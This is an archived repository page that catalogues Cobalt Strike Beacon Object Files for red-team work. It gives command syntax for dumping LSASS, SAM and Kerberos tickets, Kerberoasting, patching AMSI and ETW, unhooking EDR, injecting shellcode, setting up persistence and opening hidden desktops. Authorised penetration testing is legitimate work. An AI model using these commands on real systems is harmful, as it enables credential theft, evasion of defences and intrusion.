• This repository has been archived on 16/Aug/2024
  • Stars
    star
    129
  • Rank 279,262 (Top 6 %)
  • Language
  • Created almost 3 years ago
  • Updated about 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Useful Cobalt Strike BOFs found or used during engagements

DEPRECATED: Project moved to my other Repo Here


CobaltStrike BOF Collections

Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements.


Enumeration

arp --> List arp tables
ipconfig --> Run ipconfig
ldapsearch [query]
listdns --> Pulls DNS cache
netuser [username] [opt: domain] --> Get info on user account
nslookup [hostname] --> Perform DNS query
tasklist --> Get local running processes
  • Find Objects BOF
    Use direct system calls to enumerate processes for specific loaded modules (amsi.dll, clr.dll) or process handles (lsass.exe)
    Avoids fork&run
FindModule amsi.dll
FindProcHandle lsass.exe
  • BOF Collection
    A set of BOFs useful for enumeration and exploitation. Examples include:
inline-execute GetDomainInfo.o --> Get domain info from DC

inline-execute GetClipboard.o --> Prints any text on the user's clipboard

enumwifi --> Enumerate wifi connections
dumpwifi Wifi_Profile_Name --> Dump wifi cleartext credentials

bofportscan 192.168.1.10 3389 --> Port scanner

inline-execute RegistryPersistence.o Install --> Install registry persistence
inline-execute RegistryPersistence.o Remove --> Remove registry persistence
  • whereami
    A "Where Am I" BOF which is a way to run the whoami.exe binary but in an opsec safe way by pulling the info from the current beacon process memory.
    Also pulls current environment variables.
    whereami

  • RiccardoAncarani BOFs
    A useful BOF collection to perform various tasks in a safer opsec way.

send_shellcode_via_pipe <pipe> <file> --> Send shellcode or any byte via a named pipe
cat <file> --> Read file, supports remote shares
wts_enum_remote_processes <host> --> Enumerate remote processes using WTS APIs
unhook <module>, unhook ntdll.dll --> Use direct syscalls to unhook APIs of a specific DLL (works only on 64-bit beacons)
  • Outflank C2 Tool Collection
    Great list of useful tools converted to BOFs for better opsec.
    Tools like add machine account, kerberoast, LAPS password dump, SMB info, LDAP AD spray, and more!
GetMachineAccountQuota --> Get domain machine account quota
AddMachineAccount [*Computername] [Optional Password] --> Create new machine account - requires MachineAccountQuota to create new account
Domaininfo --> Enumerate AD domain
Kerberoast list --> List SPN enabled accounts
Kerberoast roast SamAccountName --> Kerberoast specific username
Lapsdump <computername> --> Dump LAPS passwowrds on remote systems within AD (requires elevated privileges on target)
Psc --> Show detailed information from processes with established TCP and RDP connections
Psw --> 	Show window titles from processes with active windows
Psx --> Show detailed information from all processes running on the system and provides a summary of installed security products and tools.
Smbinfo <compuername> --> Get SMB info of remote system instead of using CS portscan SMB
Winver --> Shows the version of Windows that is running on the local system
  • tgtdelegation
    Kerberos ticket delegation - Obtain usable TGTs for the current user, does not require Admin privileges!
    Request TGT of active user in the current domain obtained from USERDNSDOMAIN environment variable, outputs TGT blobs to .kirbi and .ccache files
tgtdelegation currentdomain default
[+] received output:
[+] tgtdelegation succeeded!

[+] Invoking tgtParse.py to obtain a usable .ccache!

[+] Successfully decrypted the AP-REQ response!

[+] Local path to usable .ccache: /home/[email protected]
[+] Local path to usable .kirbi: /home/[email protected]

Now use .ccache or .kirbi files to load TGT into memory
export KRB5CCNAME=/home/[email protected]
Continue to use ticket in memory with other tooling of your choice! (i.e. Impacket's "-k -no-pass" command)

  • PrivKit
    Windows privilege escalation BOF kit used for detecting priv esc vulnerabilities including unquoted service paths, hijackable paths, autologon registry keys, etc.
    Check for all vulnerabilities supported:
    privcheck

Executing .NET Assemblies

  • InlineExecute-Assembly
    Perform .NET assembly execution of any .NET executable without any prior modifications required
    The BOF also supports several flags to disabling AMSI via in memory patching, disabling and restoring ETW via in memory patching, or customization of the CLR App Domain name to be created
    inlineExecute-Assembly --dotnetassembly /home/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw --amsi --mailslot totallyLegitMailslot

  • inject-assembly
    Another alternative .NET executable loader to inject an assembly into a running process
    inject-assembly 0 /home/Rubeus.exe [args...]

  • BOF.NET
    Critical tool for red teams that allows you to run .NET assemblies as BOFs within the beacon process

bofnet_init --> Start BOF.NET
bofnet_listassemblies --> List loaded .NET assemblies
bofnet_load /Path/To/Assembly.exe --> Load assembly
bofnet_execute bof_name [args] --> Execute assembly
bofnet_shutdown --> Kill BOF.NET

Exploitation

  • ajpc500 BOFs
    A collection of very useful BOFs for various utilities including different techniques of shellcode injection with syscalls, process dumping (LSASS!), and patching ETW for better evasion.
etw stop --> Patch etw
syscalls_inject <PID> <listener_name> / syscalls_shinject <PID> <path_to_bin> --> Syscalls shellcode injection
syscalls_spawn <listener> / syscalls_shspawn <path_to_bin> --> Spawn and syscalls injections
static_syscalls_apc_spawn <listener> / static_syscalls_apc_spawn <path_to_bin> --> Spawn and static syscalls shellcode njection (NtQueueApcThread)
static_syscalls_inject <PID> <listener_name> / static_syscalls_shinject <PID> <path_to_bin> --> Static syscalls shellcode injection (NtCreateThreadEx)
static_syscalls_dump <PID> [path_to_output] --> Process dump with syscalls (i.e. Dump LSASS!)
bof-regsave c:\temp\ --> Dumps SAM database files to target folder C:\temp\
  • Unhook BOF
    Created by Raphael Mudge, this BOF will attempt to unhook userland APIs to bypass EDR
    Sort of the "hail mary" for attempting to unhook APIs
    unhook

  • WdToggle
    Enables WDigest credential caching using direct system calls
    Bypasses Windows Credential Guard if enabled

inline-execute WdToggle.o --> First enable WdDigest caching
logonpasswords --> Second, wait for users to login and then run Mimikatz to dump their newly cached cleartext passwords
  • TrustedSec CS-Remote-OPs-BOF
    Great repo of new BOFs from TrustedSec to follow up their SituationalAwareness BOFs.
    Includes dumping a process, decrypting Chrome keys, persistence techniques (registry, scheduled tasks, services), and more!
adcs_request --> Request an enrollment certificate
procdump --> Dump specified process to output file
reg_set --> Set/create a registry key
sc_create --> Create a new service
schtaskscreate --> Create a new scheduled task
setuserpass --> Set a users password
  • Inject AMSI Bypass
    BOF that bypasses AMSI in a remote process with code injection
    inject-amsiBypass <PID>

  • Inject ETW Bypass
    Inject ETW Bypass into Remote Process via Syscalls
    injectEtwBypass <PID>

  • Kerberoast BOF
    BOF for targeted Kerberoasting against input SPN to roast
    Returns TGS that you can pass to apreq2hashcat.py (provided in repo) to output the hashcat format
    kerberoast SPN/HOSTNAME.domain.local

  • Koh
    GhostPack BOF that allows for the capture of user credentials via purposeful token/logon session leakage.
    Koh has a BOF client for capturing logon tokens in Cobalt Strike and a C# capture server to negotiate captured tokens for new logon sessions.

# Koh client BOF
help koh
  koh list              - lists captured tokens
  koh groups LUID       - lists the group SIDs for a captured token
  koh filter list       - lists the group SIDs used for capture filtering
  koh filter add SID    - adds a group SID for capture filtering
  koh filter remove SID - removes a group SID from capture filtering
  koh filter reset      - resets the SID group capture filter
  koh impersonate LUID  - impersonates the captured token with the give LUID
  koh release all       - releases all captured tokens
  koh release LUID      - releases the captured token for the specified LUID
  koh exit              - signals the Koh server to exit

koh list --> List current logon sessions
koh impersonate <LUID> --> Impersonate a logon session from above output

ls \\dc.theshire.local\C$ --> Use the impersonated privileged logon session to interact with a target system
  • Cobalt-Clip
    A clipboard add-on for Cobalt Strike to interact with the victim's clipboard. With Cobalt-Clip you can dump, edit and monitor the content of a clipboard.
dumpclip --> Dump current contents of clipboard
set-clipboard-data --> Modify victims clipboard data
clipmon --> Monitor the clipboard for new content and output to console
  • BOF-patchit
    A very easy solution to patch AMSI or ETW. Patches AMSI/ETW for the currently running x64 process.
patchit check --> List if AMSI or ETW are currently patched
patchit all --> Patch both AMSI and ETW
patchit amsi --> Only patch AMSI
patchit etw --> Only patch ETW

# DO NEFARIOUS STUFF HERE....

patchit revertAll --> Revert both AMSI and ETW
patchit revertAmsi --> Revert only AMSI
patchit revertEtw --> Revert only ETW
  • ScreenshotBOF
    Uses WinAPI and avoids fork&run to take a screenshot.
    screenshot_bof output.bmp 1

  • nanorubeus
    BOF equivalent of Rubeus for managing Kerberos tickets. It can be used cross-platform for multiple C2s including Cobalt Strike, Sliver and Brute Ratel.

nanorobeus64 luid --> Get logon current ID
nanorobeus64 klist --> List all Kerberos tickets
nanorobeus64 dump /all --> Dump all Kerberos tickets, requires local admin privileges
nanorobeus64 kerberoast /spn:HTTP/server.fortress.local --> Kerberoast a specific SPN

Miscellaneous

  • BOF Template
    Used for creating your very own BOFs!

  • BOF Hound
    An offline BloodHound ingestor and LDAP parser to be used with TrustedSec's "ldapsearch".
    Use ldapsearch in Cobalt Strike to gather data and then use bofhound on your CS logs to generate JSON files for importing into BloodHound.
    bofhound -o /data/

  • Help Color
    Color helper Aggressor script for coloring "help" output based on command type and OPSEC
    helpx

  • Hidden Desktop BOF
    Uses VNC connection and server to create a hidden remote desktop connection to your target instead of using RDP.

Start the HVNC server first
HiddenDesktop <server> <port> --> Start a hidden desktop client connection to your listening server
hd-launch-explorer --> Then start the Windows explorer browser which should pop up a new window on your system